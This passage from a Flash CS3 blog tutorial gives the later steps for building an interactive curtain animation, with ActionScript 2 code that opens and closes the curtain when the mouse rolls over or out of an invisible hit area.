13. To create the closing animation the simplest way is to duplicate the frames and then reverse it. Select all the frames in the curtain layer by clicking on its name and Right click -> Copy frame then Right click on frame 31 and select Paste frames. This will copy the opening animation, Shape Hints included. Click on frame 31 and while the Shift key is pressed click on frame 60 to select all of this frames range. Right click on the selected frames and click Reverse frames, it’ll reverse the animation but sadly it’ll also break the Shape Hints of this section, you’ll have to create it again for frame 31 and 60, similar to the previous step.

14. Select frame 31 and in the properties panel set the Ease to -50, this will create an ease-in effect so the closing animation will start a bit slower and then accelerate as it goes.

15. Test the movie to see the (half) curtain open and close. Thats it, we’re done our curtain animation it’s time to duplicate the half into a full curtain and put some interactivity into it.

16. Before you go back to the main stage add another Layer inside the curtain Movie clip and name it actions. Click on Window -> Actions (F9), while the first frame selected enter the code stop(); inside the Action panel. Create a new key frame on frame 30 of the actions layer and put a stop(); in there as well. This will prevent the curtain from animating on its own and we’ll control it with Actionscript.

Stop Action

17. Go back up to Scene 1 by double clicking on an empty area of the stage. Copy the leftCurtain Movie clip, paste it any where, set its x to 160, its y to 0 and its name to rightCurtain.

18. With the rightCurtain selected click on Modify -> Transform -> Flip Horizontal.

19. On the main Timeline in Scene 1 create another layer and name it actions open the actions panel (F9) and enter the following script:

function openCurtain():Void{
leftCurtain.gotoAndPlay(1);
rightCurtain.gotoAndPlay(1);
}

function closeCurtain():Void{
leftCurtain.gotoAndPlay(31);
rightCurtain.gotoAndPlay(31);
}

20. We can call these functions to open and close the curtain as we like, in this example we’ll open the curtain when the mouse roll over it and close it when it roll out.

21. Create another layer beneath the actions layer but above the curtain layer and name it hitArea. Draw a green rectangle and set it’s alpha to 0%, the color doesn’t really matter since this rect will be invisible, also set it’s width to 320, height to 240 and x, y to 0. Click F8 to turn this rectangle to a Movie clip and name it hitArea. in the properties panel name the hitArea instance on the stage to hit.

22. Add this code to the actions layer:

hit.onRollOver = openCurtain;
hit.onRollOut = closeCurtain;

Now every time we roll over the invisible hit Movie clip that is above the curtain the function openCurtain will be called and when we’ll roll out from it the closeCurtain will be called.

23. Test the movie to see that we now got our interactive animated curtain, roll over it and it opens, roll out and it closes. But, if you’ll play with it a little you’ll see that it’s not always act as it should. For example, when you roll out while the curtain is opening it jumps to beginning of the closing sequence instead of closing from the current position. To fix that we’ll add a simple calculation to find the right frame we need to jump to in order for the animation to look seamless.

24. Replace the code in the action frame with this:

hit.onRollOver = openCurtain;
hit.onRollOut = closeCurtain;

var nTotalFrames:Number = leftCurtain._totalframes;

function openCurtain():Void{
var nFrame:Number;
if(leftCurtain._currentframe > nTotalFrames / 2){
nFrame = leftCurtain._totalframes – leftCurtain._currentframe + 2;
}else{
nFrame = leftCurtain._currentframe;
}
leftCurtain.gotoAndPlay(nFrame);
rightCurtain.gotoAndPlay(nFrame);
}

function closeCurtain():Void{
var nFrame:Number = leftCurtain._totalframes – leftCurtain._currentframe;
leftCurtain.gotoAndPlay(nFrame);
rightCurtain.gotoAndPlay(nFrame);
}

We just changed the open and close functions to be a bit more smart ones, function that knows to which frame to gotoAndPlay, it does it according to the current frame and not just jump blindly to the beginning of each sequence.

Test the movie and behold, our interactive curtain is ready.

Tip: you can add this code, hit.useHandCursor = false; so the cusror won’t change into a hand when you hover the curtain.

Download Curtain Animation source files

Posted in Actionscript, Animation, Flash CS3, Flash General | 3 Comments »

« Older Entries